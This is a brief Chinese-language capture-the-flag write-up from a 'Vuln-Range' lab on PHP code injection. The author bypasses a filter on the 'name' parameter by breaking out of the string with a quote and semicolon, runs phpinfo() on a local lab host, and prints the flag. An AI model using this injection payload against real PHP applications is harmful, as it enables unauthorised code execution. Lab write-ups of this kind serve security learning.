Vuln-Range之php命令注入

1.开启靶场

Vuln-Range之php命令注入

简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。

Vuln-Range之php命令注入

通过传入name参数的值就可以来进行代码注入了。

2.随便试一个值

http://192.168.0.20:32769/?name=phpinfo()

Vuln-Range之php命令注入

果然没有那么简单,被过滤了。

3.查看源码

Vuln-Range之php命令注入

 

Vuln-Range之php命令注入

我不太懂php的代码,查阅了一下,可以通过截断的方式来进行绕过

";phpinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;phpinfo();%22\

Vuln-Range之php命令注入

拿到flag

flag{39a23b19e7df2581be80091b484687bc} 

 

上一篇:phpinfo应注意什么


下一篇:Login failed for user 'NT AUTHORITY\NETWORK SERVICE'的解决方法